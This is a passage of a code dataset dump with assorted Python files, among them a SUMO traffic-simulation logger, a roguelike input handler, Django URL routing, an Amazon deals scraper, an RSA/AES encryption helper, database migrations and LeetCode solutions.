self.er_tong,\n u'青年': self.qing_nian,\n u'长者': self.zhang_zhe\n }","sub_path":"FieldGenerator/lvyou/huochepiao/guo_ji_huo_che_piao.py","file_name":"guo_ji_huo_che_piao.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"1977765","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport os, sys\nimport optparse\nimport random\n\n# Declares necessary path for SUMO_HOME variable\nif 'SUMO_HOME' in os.environ:\n tools = os.path.join(os.environ['SUMO_HOME'], 'tools')\n sys.path.append(tools)\nelse:\n sys.exit(\"please declare environment variable 'SUMO_HOME'\")\n\n\nfrom sumolib import checkBinary \nimport traci \nimport traci.constants as tc\nimport subprocess\nimport sumolib\nimport numpy as np\nimport pandas as pd\n\nfrom tqdm import tqdm\nfrom datetime import datetime\n\n\n\ndef get_edge_data(edge):\n # numerical data per edge\n edge_id = edge.getID()\n street_name = traci.edge.getStreetName(edge_id)\n co = traci.edge.getCOEmission(edge_id)\n co2 = traci.edge.getCO2Emission(edge_id)\n noise = traci.edge.getNoiseEmission(edge_id)\n num_veh = traci.edge.getLastStepVehicleNumber(edge_id)\n ped = traci.edge.getLastStepPersonIDs(edge_id) \n pmx_emission = traci.edge.getPMxEmission(edge_id)\n hc_emission = traci.edge.getHCEmission(edge_id)\n nox_emission = traci.edge.getNOxEmission(edge_id)\n data = [street_name, co, co2, noise, num_veh, ped, hc_emission, nox_emission, pmx_emission]\n return data\n\ndef get_tl_data(tl):\n # string format is necessary to view in stdout\n t_id = tl.getID()\n phase = str(traci.trafficlight.getPhase(t_id))\n state = str(traci.trafficlight.getRedYellowGreenState(t_id))\n switch = str(traci.trafficlight.getNextSwitch(t_id))\n data = [phase, state, switch]\n return data \n\ndef write_data_to_file(path, data_id, df, str_data_type, step):\n # path: where to save the files\n # data_id: name of kind of data; edge, tl, etc\n # df: dataframe \n # str_data_type: type_data\n # step: time interval in ticks\n\n suffix = '.csv'\n file_name = str(data_id) + '_' + str(str_data_type)\n destination_path = os.path.join(path, file_name + suffix)\n with open(destination_path, 'w') as f:\n df = pd.DataFrame(df)\n df.to_csv(destination_path, header=True, mode='w', index=False)\n return \n\ndef generate_edge_data(total_steps, num_entries, traci, edges, step):\n edge_series_data = {}\n for step in tqdm(range(total_steps)):\n traci.simulationStep()\n if step % 5 == 0:\n # Create the data per edge\n for e in edges[:num_entries]:\n edge_id = e.getID()\n edge_data = [step] + get_edge_data(e)\n print(edge_id,edge_data)\n if edge_id not in edge_series_data:\n edge_series_data[edge_id] = [['step', 'street_name','co', 'co2', 'noise','num_veh','ped','hc_emission','nox_emission']]\n else:\n edge_series_data[edge_id].append(edge_data)\n return edge_series_data\n\ndef generate_tl_data(total_steps, num_entries, traci, tl, step):\n tl_series_data = {}\n for step in tqdm(range(total_steps)):\n traci.simulationStep()\n if step % 5 == 0:\n # Create the data per edge\n for t in tl[:num_entries]:\n tl_id = t.getID()\n tl_data = [step] + get_tl_data(t)\n # print(\"edge_data\",edge_data)\n if tl_id not in tl_series_data:\n tl_series_data[tl_id] = [['step', 'phase', 'state', 'switch']]\n else:\n tl_series_data[tl_id].append(tl_data)\n return tl_series_data\n \ndef get_df(edge_data):\n # edge_data = 2D array of values\n # edge_df = pd.DataFrame.from_dict(edge_data, orient='index')\n edge_data = np.array(edge_data)\n print(edge_data)\n df = pd.DataFrame(data=edge_data[1:,1:], # values\n index=edge_data[1:,0], # 1st column as index\n columns=edge_data[0,1:]) # 1st row as the column names\n return df\n\n\n\n\nif __name__ == \"__main__\":\n\n # Sumo init and global simulatio parameters\n sumoBinary = checkBinary('sumo')\n sumo_cmd = [sumoBinary, \"-c\", \"osm.sumocfg\"]\n traci.start(sumo_cmd)\n step = 0 \n total_steps = 11 # steps taken by the simulation\n num_entries = 10 # number of edges or traffic lights you want to create files for\n date = datetime.now().strftime(\"%I-%M-%S-%B-%d-%Y\") # path parameter\n dir_name = r'\\edge_data' + '-'+ str(total_steps) + '-' + str(num_entries) + '' + date\n datafile_path = os.path.dirname(os.path.abspath(__file__)) + dir_name\n tl_dir_name = r'\\tl_data' + '-' + str(total_steps) + '-' + str(num_entries) + date\n tl_datafile_path = os.path.dirname(os.path.abspath(__file__)) + tl_dir_name\n\n net = sumolib.net.readNet('osm.net.xml')\n edges = net.getEdges()\n nodes = net.getNodes()\n tl = net.getTrafficLights()\n\n\n # Make new directories to store data for edge and traffic lights\n \n\n print(\"Starting Simulation...\")\n print(\"Generating Edge Data...\")\n edge_series_data = generate_edge_data(total_steps, num_entries, traci, edges, step)\n\n print(edge_series_data)\n if not os.path.exists(datafile_path):\n os.makedirs(datafile_path)\n\n print(\"Generating Data Files...\")\n for edge_id, edge_data in tqdm(edge_series_data.items()):\n edge_series_df = get_df(edge_data)\n write_data_to_file(datafile_path, edge_id, edge_data, 'edge', step)\n\n tl_series_data = generate_tl_data(total_steps, num_entries, traci, tl, step)\n\n if not os.path.exists(tl_datafile_path):\n os.makedirs(tl_datafile_path)\n\n print(\"Generating Traffic Light Data...\")\n for tl_id, tl_data in tqdm(tl_series_data.items()):\n # print(\"edge_data:\", edge_data)\n tl_series_df = get_df(tl_data)\n write_data_to_file(datafile_path, tl_id, tl_data, 'tl', step)\n\n traci.close()\n\n","sub_path":"2019-03-18-00-26-01/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":5731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"388688367","text":"import tcod\nfrom sim.control_handlers.input_handler import InputHandler\nfrom defs import legend\nfrom defs.game import GameTurn, GameMode\nfrom defs.input import controls, categories\nfrom defs.colors import palette\nfrom defs.render import RenderOrder\nfrom ecs.components import (\n Position,\n Velocity,\n Moveable,\n Controllable,\n Player,\n Cursor,\n Drawable,\n Item,\n PickedUp,\n)\n\n\nclass PlayHandler(InputHandler):\n def __init__(self, exit_func, ecs):\n super(PlayHandler, self).__init__(exit_func, ecs)\n\n def input_to_actions(self, sim, keyboard, mouse):\n if keyboard.vk == tcod.KEY_CHAR:\n char = keyboard.c\n\n # Movement\n if char == controls.Play.north.value:\n return {categories.MOVE: (0, -1)}\n elif char == controls.Play.south.value:\n return {categories.MOVE: (0, 1)}\n elif char == controls.Play.east.value:\n return {categories.MOVE: (1, 0)}\n elif char == controls.Play.west.value:\n return {categories.MOVE: (-1, 0)}\n\n # Other\n elif char == controls.Play.wait.value:\n return {categories.WAIT: True}\n elif char == controls.Play.pick_up.value:\n return {categories.PICK_UP: True}\n\n # Mode Changes\n # Look Mode\n elif char == controls.Play.look_mode.value:\n return {categories.CHANGE_MODE: GameMode.look}\n\n def handle_actions(self, sim, actions):\n move = actions.get(categories.MOVE)\n wait = actions.get(categories.WAIT)\n pickup = actions.get(categories.PICK_UP)\n change_mode = actions.get(categories.CHANGE_MODE)\n turn_over = False\n\n if change_mode:\n self.change_to_look_mode(sim)\n\n if move:\n self.process_move(move, sim)\n turn_over = True\n\n if pickup:\n picked_up = self.process_pickup()\n turn_over = picked_up\n\n if wait:\n turn_over = True\n\n if turn_over and sim.mode is GameMode.play:\n sim.turn = GameTurn.ai_turn\n\n def process_pickup(self):\n cx = 0\n cy = 0\n player = None\n # Get the player position\n for ent, (_, pos) in self.ecs.get_components(Player, Position):\n cx = pos.x\n cy = pos.y\n player = ent\n\n if player:\n # Get Items at the player's position\n for ent, (_, pos) in self.ecs.get_components(Item, Position):\n if cx == pos.x and cy == pos.y:\n self.ecs.add_component(ent, PickedUp(player))\n return True\n else:\n return False\n\n def change_to_look_mode(self, sim):\n sim.mode = GameMode.look\n cx = 0\n cy = 0\n\n # Get the player position\n for ent, (_, pos) in self.ecs.get_components(Player, Position):\n cx = pos.x\n cy = pos.y\n\n # Create a cursor at the player position\n self.ecs.create_entity(\n Cursor(),\n Position(x=cx, y=cy),\n Moveable(),\n Velocity(),\n Controllable(),\n Drawable(\n legend=legend.SELECTION,\n bg=palette.selection_bg,\n fg=palette.selection_fg,\n render_order=RenderOrder.CURSOR,\n blend=tcod.BKGND_OVERLAY,\n ),\n )\n\n def process_move(self, move, sim):\n dx, dy = move\n for ent, (con, vel) in self.ecs.get_components(Controllable, Velocity):\n vel.x = dx\n vel.y = dy\n\n def handle_input(self, sim, keyboard, mouse):\n super().handle_input(sim, keyboard, mouse)\n if sim.turn is GameTurn.player_turn:\n actions = self.input_to_actions(sim, keyboard, mouse)\n if actions:\n self.handle_actions(sim, actions)\n","sub_path":"src/sim/control_handlers/play_handler.py","file_name":"play_handler.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"349531481","text":"from setuptools import find_packages\nfrom setuptools import setup\nimport os\n\n\nversion = '0.1'\nshortdesc = 'SQLAlchemy integration for cone.app'\nlongdesc = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()\nlongdesc += open(os.path.join(os.path.dirname(__file__), 'CHANGES.rst')).read()\nlongdesc += open(os.path.join(os.path.dirname(__file__), 'LICENSE.rst')).read()\n\n\nsetup(\n name='cone.sql',\n version=version,\n description=shortdesc,\n long_description=longdesc,\n classifiers=[\n 'Environment :: Web Environment',\n 'Programming Language :: Python',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n ],\n keywords='node pyramid cone web',\n author='BlueDynamics Alliance',\n author_email='dev@bluedynamics.com',\n url=u'https://github.com/bluedynamics/cone.sql',\n license='Simplified BSD',\n packages=find_packages('src'),\n package_dir={'': 'src'},\n namespace_packages=['cone'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'zope.sqlalchemy',\n 'node.ext.ugm',\n 'repoze.tm2',\n 'repoze.retry',\n 'cone.app',\n ],\n extras_require=dict(\n test=[\n 'interlude',\n 'plone.testing',\n 'unittest2',\n ],\n ),\n tests_require=[\n 'interlude',\n 'plone.testing',\n 'unittest2',\n ],\n test_suite=\"cone.sql.tests.test_suite\",\n entry_points=\"\"\"\\\n [paste.filter_app_factory]\n session = cone.sql:make_app\n \"\"\"\n)\n","sub_path":"pypi_install_script/cone.sql-0.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"469233609","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 31 20:44:36 2020\n\n@author: YinWang\n\"\"\"\n\nclass Solution(object):\n def reverseStr(self, s, k):\n \"\"\"\n :type s: str\n :type k: int\n :rtype: str\n \"\"\"\n res = \"\"\n l = len(s)\n index = 0\n while index < l//k:\n if index%2 == 0:\n res += s[k*index:k*(index+1)][::-1]\n else:\n res += s[k*index:k*(index+1)]\n index += 1\n if (l//k)%2 == 0 and l%k != 0:\n res += s[index*k:][::-1]\n if (l//k)%2 == 1 and l%k != 0:\n res += s[index*k:]\n return res","sub_path":"Week09/reverseStr.py","file_name":"reverseStr.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"509762831","text":"from django.conf.urls import url\nfrom django.views.generic import TemplateView\n\nfrom . import views\n\nurlpatterns = [\n\turl(r'^$', views.index, name='index'),\n\turl(r'^login/$', views.loginpage, name='login'),\n\turl(r'^ausschuesse/$', views.ausschuesse, name='ausschuesse'),\n\turl(r'^ausschuesse/bearbeiten/(?P.+)/neu$', views.ausschuesse_bearbeiten_neues_mitglied, name='ausschuesse_bearbeiten_neues_mitglied'),\n\turl(r'^ausschuesse/bearbeiten/(?P.+)$', views.ausschuesse_bearbeiten, name='ausschuesse_bearbeiten'),\n\turl(r'^beschluesse/$', views.beschluesse, name='beschluesse'),\n\turl(r'^beschluesse/entfernen/$', views.beschluesse_entfernen, name='beschluesse_entfernen'),\n\turl(r'^beschluesse/entfernen/(?P[0-9]+)/(?P.+)$', views.beschluesse_entfernen_ok, name='beschluesse_entfernen_ok'),\n\turl(r'^protokolle/$', views.protokolle, name='protokolle'),\n\turl(r'^protokolle/entfernen/$', views.protokolle_entfernen, name='protokolle_entfernen'),\n\turl(r'^protokolle/entfernen/(?P[0-9]+)/(?P[a-z]+)/(?P.+)$', views.protokolle_entfernen_ok, name='protokolle_entfernen_ok'),\n\turl(r'^dokumente/$', views.dokumente, name='dokumente'),\n\turl(r'^dokumente/entfernen/$', views.dokumente_entfernen, name='dokumente_entfernen'),\n\turl(r'^dokumente/entfernen/(?P[0-9]+)/(?P[0-9.]+)/(?P.+)$', views.dokumente_entfernen_ok, name='dokumente_entfernen_ok'),\n\turl(r'^dokumente/entfernen/(?P[0-9]+)/(?P.+)$', views.dokumente_entfernen_ok, name='dokumente_entfernen_ok'),\n\turl(r'^sitzungen/$', views.sitzungen, name='sitzungen'),\n\turl(r'^sitzungen/entfernen/$', views.sitzungen_entfernen, name='sitzungen_entfernen'),\n\turl(r'^sitzungen/entfernen/(?P[0-9]+)/(?P[^/]+)$', views.sitzungen_entfernen_ok, name='sitzungen_entfernen_ok'),\n\turl(r'^sitzungen/edit/(?P[0-9]+)/(?P[^/]+)/copyfrom/(?P[0-9]+)/(?P[^/]+)$', views.sitzungen_edit, name='sitzungen_edit_copy'),\n\turl(r'^sitzungen/edit/(?P[0-9]+)/(?P[^/]+)$', views.sitzungen_edit, name='sitzungen_edit'),\n\turl(r'^history/$', views.history, name='history'),\n]","sub_path":"amsel/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"396477122","text":"\"\"\"nba_persistence URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Import the include() function: from django.conf.urls import url, include\n 3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom rest_framework import routers\n\nimport settings\nfrom data.views import TeamViewSet, PositionViewSet, SeasonViewSet, GameViewSet, BoxScoreViewSet, PlayerViewSet, DailyFantasySportsSiteViewSet, PlayerSalaryViewSet\n\nteam_list = TeamViewSet.as_view({\n 'get': 'list'\n})\n\nteam_detail = TeamViewSet.as_view({\n 'get': 'retrieve'\n})\n\nposition_list = PositionViewSet.as_view({\n 'get': 'list'\n})\n\nposition_detail = PositionViewSet.as_view({\n 'get': 'retrieve'\n})\n\nseason_list = SeasonViewSet.as_view({\n 'get': 'list'\n})\n\nseason_detail = SeasonViewSet.as_view({\n 'get': 'retrieve'\n})\n\nplayer_list = PlayerViewSet.as_view({\n 'get': 'list',\n})\nplayer_detail = PlayerViewSet.as_view({\n 'get': 'retrieve',\n})\n\ngame_list = GameViewSet.as_view({\n 'get': 'list'\n})\n\ngame_detail = GameViewSet.as_view({\n 'get': 'retrieve'\n})\n\nbox_score_list = BoxScoreViewSet.as_view({\n 'get': 'list'\n})\n\nbox_score_detail = BoxScoreViewSet.as_view({\n 'get': 'retrieve'\n})\n\ndaily_fantasy_sports_site_list = DailyFantasySportsSiteViewSet.as_view({\n 'get': 'list'\n})\n\ndaily_fantasy_sports_site_detail = DailyFantasySportsSiteViewSet.as_view({\n 'get': 'retrieve'\n})\n\nplayer_salary_list = PlayerSalaryViewSet.as_view({\n 'get': 'list'\n})\n\nplayer_salary_detail = PlayerSalaryViewSet.as_view({\n 'get': 'retrieve'\n})\n\nrouter = routers.SimpleRouter()\n\nurlpatterns = [\n url(r'^players/$', player_list, name='player-list'),\n url(r'^players/(?P[0-9]+)/$', player_detail, name='player-detail'),\n url(r'^teams/$', team_list, name='team-list'),\n url(r'^teams/(?P[0-9]+)/$', team_detail, name='team-detail'),\n url(r'^positions/$', position_list, name='position-list'),\n url(r'^positions/(?P[0-9]+)/$', position_detail, name='position-detail'),\n url(r'^seasons/$', season_list, name='season-list'),\n url(r'^seasons/(?P[0-9]+)/$', season_detail, name='season-detail'),\n url(r'^games/$', game_list, name='game-list'),\n url(r'^games/(?P[0-9]+)/$', game_detail, name='game-detail'),\n url(r'^box_scores/$', box_score_list, name='boxscore-list'),\n url(r'^box_scores/(?P[0-9]+)/$', box_score_detail, name='boxscore-detail'),\n url(r'^daily_fantasy_sports_sites/$', daily_fantasy_sports_site_list, name='dailyfantasysportssite-list'),\n url(r'^daily_fantasy_sports_sites/(?P[0-9]+)/$', daily_fantasy_sports_site_detail, name='dailyfantasysportssite-detail'),\n url(r'^player_salaries/$', player_salary_list, name='player_salary-list'),\n url(r'^player_salaries/(?P[0-9]+)/$', player_salary_detail, name='player_salary-detail'),\n url(r'^admin/', admin.site.urls),\n url(r'^', include(router.urls)),\n url(r'^static/(?P.*)$', 'django.views.static.serve', {'document_root': settings.STATIC_ROOT}),\n]\n","sub_path":"nba_persistence/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"361846052","text":"# .-. coding=utf-8\nimport urllib2\nimport datetime\nfrom lxml import etree\nfrom kernel import collector\nfrom kernel.collector import object_found\n\nLIST_URL = 'http://www.amazon.cn/%E4%BF%83%E9%94%80-%E7%89%B9%E4%BB%B7/b/ref=cs_top_nav_gb27/475-8883503-9352433?ie=UTF8&node=42450071'\nLIST_XPATH = '//*[@id=\"hot\"]/div[1]/div[2]/ul/li'\nTITLE_PATH = 'div[2]/a'\nPREVIEW_PATH = 'div[1]/a/img'\nPRICE_PATH = 'div[3]/strong'\n\nclass AmazonCollecotr(collector.BaseCollector):\n def fetch(self):\n self.logger.info(\"Start fetching data from www.360buy.com...\")\n parser = etree.HTMLParser(encoding='gbk')\n text = urllib2.urlopen(LIST_URL).read(-1)\n tree = etree.HTML(text, parser=parser)\n\n time = datetime.datetime.now().date().strftime('%Y-%m-%d')\n nodes = tree.xpath(LIST_XPATH)\n for node in nodes:\n node1 = node.find(TITLE_PATH)\n #print etree.tostring(node, method='html', encoding='utf-8')\n title = node1.attrib['title']\n url = node1.attrib['href']\n node2 = node.find(PREVIEW_PATH)\n preview = node2.attrib['src']\n node3 = node.find(PRICE_PATH)\n price = node3.text\n self.logger.info(\"%s: %s - %s\" % (time, title, url))\n self.logger.info(\"%s - %s\" % (price, preview))\n object_found.send(self, time=time, title=title, url=url, preview=preview ,price=price)","sub_path":"collectors/interesting/amazon.py","file_name":"amazon.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"649132722","text":"\"\"\"empty message\n\nRevision ID: d3189cb5fe01\nRevises: 2f2eb852559d\nCreate Date: 2018-03-02 16:58:09.525796\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd3189cb5fe01'\ndown_revision = '2f2eb852559d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('cluster', sa.Column('executor_cores', sa.Integer(), nullable=False))\n op.add_column('cluster', sa.Column('executor_memory', sa.String(length=15), nullable=False))\n op.add_column('cluster', sa.Column('executors', sa.Integer(), nullable=False))\n op.add_column('cluster', sa.Column('general_parameters', sa.String(length=1000), nullable=False))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('cluster', 'general_parameters')\n op.drop_column('cluster', 'executors')\n op.drop_column('cluster', 'executor_memory')\n op.drop_column('cluster', 'executor_cores')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/d3189cb5fe01_.py","file_name":"d3189cb5fe01_.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"520608722","text":"from Crypto.PublicKey import RSA\r\nfrom Crypto.Random import get_random_bytes\r\nfrom Crypto.Cipher import AES, PKCS1_OAEP\r\nfrom io import BytesIO\r\n\r\nclass Criptografia:\r\n \r\n \r\n def criaChaves(self):\r\n \r\n #cria chave\r\n key = RSA.generate(2048)\r\n #gerando chave pub e priv\r\n private_key= key.export_key()\r\n public_key= key.publickey().export_key()\r\n #criando dicionario\r\n chaves={\"private\":private_key, \"public\":public_key}\r\n return chaves\r\n\r\n def criptografar(self, pub, texto):\r\n #Variaveis\r\n lista=[]\r\n crip=''\r\n texto=str(texto)\r\n #Importando chave RSA\r\n chave_rsa_pub=RSA.import_key(pub)\r\n session=get_random_bytes(16)\r\n \r\n #encriptando chave RSA\r\n chave_rsa= PKCS1_OAEP.new(chave_rsa_pub)\r\n enc_ses=chave_rsa.encrypt(session)\r\n \r\n #encriptando dados com\r\n chavAes = AES.new(session, AES.MODE_EAX)\r\n text, tag = chavAes.encrypt_and_digest(texto.encode(\"utf8\"))\r\n [lista.append(x) for x in(enc_ses, chavAes.nonce, tag, text)]\r\n crip=b''.join(lista)\r\n\r\n return crip\r\n \r\n def descriptografar(self, priv, texto):\r\n chave_rsa= RSA.import_key(priv)\r\n entrada=BytesIO(texto)\r\n\r\n chave_priv ,nonce, tag, text=\\\r\n [entrada.read(x) for x in(chave_rsa.size_in_bytes(),16,16,-1)]\r\n\r\n #Descriptografando chave RSA\r\n cipher_rsa = PKCS1_OAEP.new(chave_rsa)\r\n session_key = cipher_rsa.decrypt(chave_priv)\r\n\r\n # Descriptografando dados com AES\r\n chave_aes = AES.new(session_key, AES.MODE_EAX, nonce)\r\n descrip = chave_aes.decrypt_and_verify(text, tag)\r\n \r\n return descrip.decode(\"utf-8\")\r\n \r\n\r\n","sub_path":"src/packages/CriptografiaRSA.py","file_name":"CriptografiaRSA.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"308788813","text":"import json\n\nfrom flask import Blueprint, jsonify, render_template\n\n# register the blueprint\ninsight_controller = Blueprint('insight_controller', __name__)\n\n# route: '/insight/data/history'\n# returns: json, fetched from the 'static/model_history/history.json' -file\n@insight_controller.route('/data/history')\ndef insight_data_history():\n with open('static/model_history/history.json', 'r') as file:\n op = json.load(file)\n return jsonify(op)\n\n# route: '/insight/data/report'\n# returns: json, fetched from the 'static/model_history/classification_report.json' -file\n@insight_controller.route('/data/report')\ndef insight_data_report():\n with open('static/model_history/classification_report.json', 'r') as file:\n op = json.load(file)\n return jsonify(op)\n\n# route: '/insight/data/confusion_matrix'\n# returns: json, fetched from the 'static/model_history/confusion_matrix.json' -file\n@insight_controller.route('/data/confusion_matrix')\ndef insight_data_confusion_matrix():\n with open('static/model_history/confusion_matrix.json', 'r') as file:\n op = json.load(file)\n return jsonify(op)\n\n# route: '/insight/data/current_situation'\n# returns: json, fetched from the 'static/model_history/situations.json' -file\n@insight_controller.route('/data/current_situation')\ndef insight_data_current_situation():\n with open('static/model_history/situations.json', 'r') as file:\n cs = json.load(file)\n return jsonify(cs)\n","sub_path":"controllers/insight_controller.py","file_name":"insight_controller.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"223046763","text":"#!/usr/bin/env python\nimport os\nfrom setuptools import setup, find_packages\n\nversion = __import__('hipsaint').__version__\n\nsetup(\n name = \"hipsaint\",\n version = version,\n\n description = \"\",\n long_description = file(\n os.path.join(\n os.path.dirname(__file__),\n \"README.md\"\n )\n ).read(),\n author = \"Hannes Ljungberg\",\n author_email = \"hannes@5monkeys.se\",\n url = \"http://github.com/hannseman/hipsaint\",\n download_url = \"https://github.com/5monkeys/hipsaint/tarball/%s\" % (version,),\n\n keywords = [\"nagios\", \"hipchat\", \"api\", \"plugin\"],\n classifiers = [\n \"Programming Language :: Python\",\n \"Development Status :: 3 - Alpha\",\n \"Natural Language :: English\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Operating System :: OS Independent\",\n \"Topic :: Utilities\"\n ],\n\n zip_safe = False,\n packages = find_packages(exclude=[\"examples\"]),\n include_package_data = True,\n\n install_requires = [\n \"Jinja2==2.6\",\n \"requests==0.13.0\"\n ],\n\n entry_points=\"\"\"\n [console_scripts]\n hipsaint=hipsaint.bin.commands:main\n\t\"\"\"\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"162335850","text":"import requests\nfrom bs4 import BeautifulSoup\nimport lxml\nimport json\nimport execjs\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QTableWidgetItem\nimport sys\n\n# 初始化变量\n\n\nclass report:\n def __init__(self, hot,againest):\n self.hot = hot\n self.againest = againest\n def show(self):\n print(self.hot)\n print(self.againest)\n def put(self):\n\n for i in range(9):\n print( self.hot[str(i+1)][\"used_rate\"])\n\n\nladder_hot_wild='data1'\nladder_againest_wild='data2'\nladder_hot_standard='data3'\nladder_againest_standard ='data4'\n\n# 主体部分 数据获取\nhtml = requests.get(\"http://lushi.163.com/bigdata/\")\nsoup=BeautifulSoup(html.text)\n\na=soup.find_all('script', {'type': 'text/javascript'})\n\nfor i in a:\n try:\n if 'tianti' in i['src']:\n data=i['src']\n break\n except:\n pass\n\n# 字符串处理\na=requests.get(data).text\nb=a.split('\\n')\nb=b[0:-1]\nb=','.join(b)\nb=b.replace('=',':')\nb='{'+b+'}'\nb=b.replace('var','')\nb=eval(b)\nlist1=[i for i in b]\n\nreport1 = report(b[list1[0]], b[list1[1]])\nreport1.put()","sub_path":"废弃备用参考代码/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"595486247","text":"\"\"\"\nThis code aims at implementing DFP algorithm to search the optimal resolution.\n\nAuthor: Yichong Huang (黄毅翀)\nStudent Code: 20S103272\n\"\"\"\n\nimport numpy as np\nimport numpy.linalg as lg\n\ndf = lambda x: np.array([[20 * x[0][0]], [2 * x[1][0]]])\nx = np.array([[0.1], [1]])\nH = np.eye(2)\nepsilon = 1e-5\ns = 1000\n\nwhile np.average(np.abs(s)) > epsilon:\n x1 = x - lg.inv(H).dot(df(x))\n s = x1 - x\n y = df(x1) - df(x)\n tmp = y - H.dot(s)\n H = H + tmp.dot(tmp.T) / ((tmp.T).dot(s))\n x = x1\n\nprint(x)\n\n","sub_path":"problem-5.py","file_name":"problem-5.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"286633079","text":"# -*- coding: utf-8 -*-\nimport pytest\n\n\n@pytest.mark.unit\n@pytest.mark.parametrize(\"key, expected_value\", [\n (\"__name__\", \"rb_tutorial\"),\n (\"__description__\", \"Rogue Basin's Complete Python 3 Tutorial\"),\n (\"__author__\", \"Brian Bruggeman\"),\n (\"__author_email__\", \"brian.m.bruggeman@gmail.com\"),\n (\"__maintainer__\", \"Brian Bruggeman\"),\n (\"__maintainer_email__\", \"brian.m.bruggeman@gmail.com\"),\n (\"__url__\", \"http://www.pypi.org\"),\n (\"__version__\", \"0.1.0\"),\n (\"__version_info__\", (0, 1, 0)),\n])\ndef test_project_metadata(key, expected_value):\n import rb_tutorial\n\n fields = [_ for _ in dir(rb_tutorial)]\n value = getattr(rb_tutorial, key, None)\n assert key in fields\n assert value == expected_value\n\n\n@pytest.mark.unit\n@pytest.mark.parametrize(\"exc_name\", [\n 'BaseException'\n])\ndef test_project_exceptions(exc_name):\n from rb_tutorial import exceptions\n\n assert hasattr(exceptions, exc_name)\n Exception = getattr(exceptions, exc_name)\n with pytest.raises(Exception):\n raise Exception()\n","sub_path":"tests/test_rb_tutorial.py","file_name":"test_rb_tutorial.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"245454863","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def numComponents(self, head, G):\n \"\"\"\n :type head: ListNode\n :type G: List[int]\n :rtype: int\n \"\"\"\n if head is None:\n return 0\n if head.next is None:\n if head.val in G:\n return 1\n else:\n return 0\n\n summ = 0\n dummy = ListNode(-1)\n dummy.next = head\n status = 'N'\n cur = dummy\n while cur.next is not None:\n prev = status\n cur = cur.next\n if cur.val in G:\n status = 'Y'\n else:\n status = 'N'\n\n if status == 'Y' and prev == 'N':\n summ += 1\n else:\n pass\n return summ\n\n","sub_path":"code/817. Linked List Components.py","file_name":"817. Linked List Components.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"84859388","text":"class Solution:\n def reverse(self, x):\n if x>-10 and x<10:\n return x\n\n result=0\n if x>0:\n while x>0:\n result=result*10+x%10\n x//=10\n result = 0 if result > pow(2, 31) else result\n else:\n x=-x\n while x>0:\n result=result*10+x%10\n x//=10\n result = 0 if result > pow(2, 31) else result\n result=-result\n return 0 if result > pow(2, 31) else result\n def reverse_ref(self, x):\n result = 0\n if x < 0:\n symbol = -1\n x = -x\n else:\n symbol = 1\n while x:\n result = result * 